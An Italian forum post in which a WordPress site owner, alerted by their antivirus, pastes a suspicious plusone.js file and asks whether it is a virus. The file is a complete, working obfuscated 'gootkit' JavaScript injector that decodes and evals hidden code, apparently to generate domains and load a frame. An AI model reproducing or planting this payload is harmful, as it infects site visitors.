-
Gootkit
Salve ragazzi,
spero di essere nella sezione giusta. Volevo un vostro parere, da due giorni quando apro il mio sito web il mio antivirus (AVG) mi dice che ci sono dei file java (jquery) pericolosi.
Ho risolto in questo modo:
ho preso i file java di backup che avevo e ho sostituito questi file nel server... poi ho notato in una cartella del mio server la presenza del file pulsone.js che non c'era prima e che ho eliminato (era nella stessa cartella di un file js che risultava infetto). Vi posto il contenuto di esso:
Codice HTML:
cat: /../..../.../miosito.it/...../wp-content/plugins/cudazi-scroll-to-top/js/plusone.js: No such file or directory
filemng: Error occured during /bin/cat command./*gootkitstart*/i=0;try{grbregd=prototype;}catch(z){h="ha"+"rCode";f=[10,17.5,14,8.5,17,11.5,14.5,14,-25,14,9.5,19,17,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-21,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,11,11.5,-25,-10.5,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-17.5,-25,17,11,11.5,16.5,-18,-0.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,13,14.5,-25,-10.5,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-22.5,-25,17,11,11.5,16.5,-18,-0.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,17,9.5,16.5,17,-25,-10.5,-25,17,11,11.5,16.5,-18,-8.5,-25,-20,-25,13,14.5,-25,-18.5,-25,17,11,11.5,16.5,-18,0,-25,-20,-25,11,11.5,-11.5,-36,-25,-25,-25,-25,11.5,10,-21,17,9.5,16.5,17,-25,-10,-25,-17,-20.5,20.5,-36,-25,-25,-25,-25,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,17,9.5,16.5,17,-11.5,-36,-25,-25,-25,-25,21.5,-25,9.5,13,16.5,9.5,-25,20.5,-36,-25,-25,-25,-25,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,17,9.5,16.5,17,-25,-19.5,-25,17,11,11.5,16.5,-18,-2.5,-11.5,-36,-25,-25,-25,-25,21.5,-36,-25,-25,-25,-25,16,9.5,17,17.5,16,14,-25,-21,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-20,-25,17,11,11.5,16.5,-18,14.5,14,9.5,-1.5,18,9.5,16,-2.5,-20.5,-11.5,-36,21.5,-36,-36,10,17.5,14,8.5,17,11.5,14.5,14,-25,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-5.5,9.5,14,9.5,16,7.5,17,14.5,16,-21,17.5,14,11.5,19,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,9,-25,-10.5,-25,14,9.5,18.5,-25,-7,7.5,17,9.5,-21,17.5,14,11.5,19,-20,-16.5,-17,-17,-17,-20.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16.5,-25,-10.5,-25,9,-18,10.5,9.5,17,-5,14.5,17.5,16,16.5,-21,-20.5,-11.5,-36,-25,-25,-25,-25,-36,-25,-25,-25,-25,11.5,10,-21,16.5,-25,-11,-25,-16.5,-16,-20.5,-25,16.5,-25,-10.5,-25,-17,-11.5,9.5,13,16.5,9.5,-25,16.5,-25,-10.5,-25,-16.5,-11.5,-36,-25,-25,-25,-25,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,-16,-15.5,-15,-14.5,-14,-13.5,-13,-12.5,-17,-16.5,-25,-19.5,-25,-21,9,-18,10.5,9.5,17,-2.5,14.5,14,17,11,-21,-20.5,-25,-20,-25,-17,19,-6,-6,-6,-6,-6,-6,-20.5,-25,-19.5,-25,-21,9,-18,10.5,9.5,17,-7,7.5,17,9.5,-21,-20.5,-25,-20,-25,-17,19,-6,-6,-6,-6,-20.5,-19.5,-25,-21,16.5,-25,-20,-25,-17,19,-6,-6,-6,-20.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-8.5,-25,-10.5,-25,-15,-13,-16,-13.5,-16.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-2.5,-25,-10.5,-25,-16,-16.5,-15,-13.5,-15,-13,-15.5,-14,-15,-13.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-0.5,-25,-10.5,-25,17,11,11.5,16.5,-18,-2.5,-25,-17.5,-25,17,11,11.5,16.5,-18,-8.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,0,-25,-10.5,-25,17,11,11.5,16.5,-18,-2.5,-25,-22.5,-25,17,11,11.5,16.5,-18,-8.5,19,-18.5,-2.5,11.5,14,-20.5,-25,-20,-25,16,-18,14,9.5,19,17,-21,-20.5,-25,-19.5,-25,-2.5,11.5,14,-20.5,-11.5,-36,21.5,-36,-36,10,17.5,14,8.5,17,11.5,14.5,14,-25,10.5,9.5,14,9.5,16,7.5,17,9.5,-1,16.5,9.5,17.5,9,14.5,0,7.5,14,9,14.5,13.5,0.5,17,16,11.5,14,10.5,-21,17.5,14,11.5,19,-19,-25,13,9.5,14,10.5,17,11,-19,-25,20,14.5,14,9.5,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16,7.5,14,9,-25,-10.5,-25,14,9.5,18.5,-25,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-5.5,9.5,14,9.5,16,7.5,17,14.5,16,-21,17.5,14,11.5,19,-20.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,13,9.5,17,17,9.5,16,16.5,-25,-10.5,-25,4.5,-21.5,7.5,-21.5,-19,-21.5,8,-21.5,-19,-21.5,8.5,-21.5,-19,-21.5,9,-21.5,-19,-21.5,9.5,-21.5,-19,-21.5,10,-21.5,-19,-21.5,10.5,-21.5,-19,-21.5,11,-21.5,-19,-21.5,11.5,-21.5,-19,-21.5,12,-21.5,-19,-21.5,12.5,-21.5,-19,-21.5,13,-21.5,-19,-21.5,13.5,-21.5,-19,-21.5,14,-21.5,-19,-21.5,14.5,-21.5,-19,-21.5,15,-21.5,-19,-21.5,15.5,-21.5,-19,-21.5,16,-21.5,-19,-21.5,16.5,-21.5,-19,-21.5,17,-21.5,-19,-21.5,17.5,-21.5,-19,-21.5,18,-21.5,-19,-21.5,18.5,-21.5,-19,-21.5,19,-21.5,-19,-21.5,19.5,-21.5,-19,-21.5,20,-21.5,5.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,8.5,14.5,13,14.5,16,16.5,-25,-10.5,-25,4.5,-21.5,16,9.5,9,-21.5,-19,-21.5,14.5,16,7.5,14,10.5,9.5,-21.5,-19,-21.5,19.5,9.5,13,13,14.5,18.5,-21.5,-19,-21.5,10.5,16,9.5,9.5,14,-21.5,-19,-21.5,8,13,17.5,9.5,-21.5,-19,-21.5,11.5,14,9,11.5,10.5,14.5,-21.5,-19,-21.5,18,11.5,14.5,13,9.5,17,-21.5,5.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16.5,17,16,-25,-10.5,-36,16.5,9.5,17,1,11.5,13.5,9.5,14.5,17.5,17,-21,13.5,7.5,12.5,9.5,-6,16,7.5,13.5,9.5,-19,-25,-16,-17,-17,-17,-20.5,-11.5];v="e"+"va";}if(v)e=window[v+"l"];try{q=document["crea"+"teEle"+"ment"]("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?h:"");for(;1920!=i;i+=1){j=i;if(e)s=s+r["fr"+"omC"+((e)?z:12)]((w[j]*1+41)*2);}
if(v&&e&&r&&z&&h&&s&&f&&v&&v&&e&&r&&h)try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}/*gootkitend*/
Mi sapreste dire cosa faceva questo codice...è un virus? Qualcuno è riuscito ad entrare nel mio sito?
Grazie 1000 dell'aiuto!!!
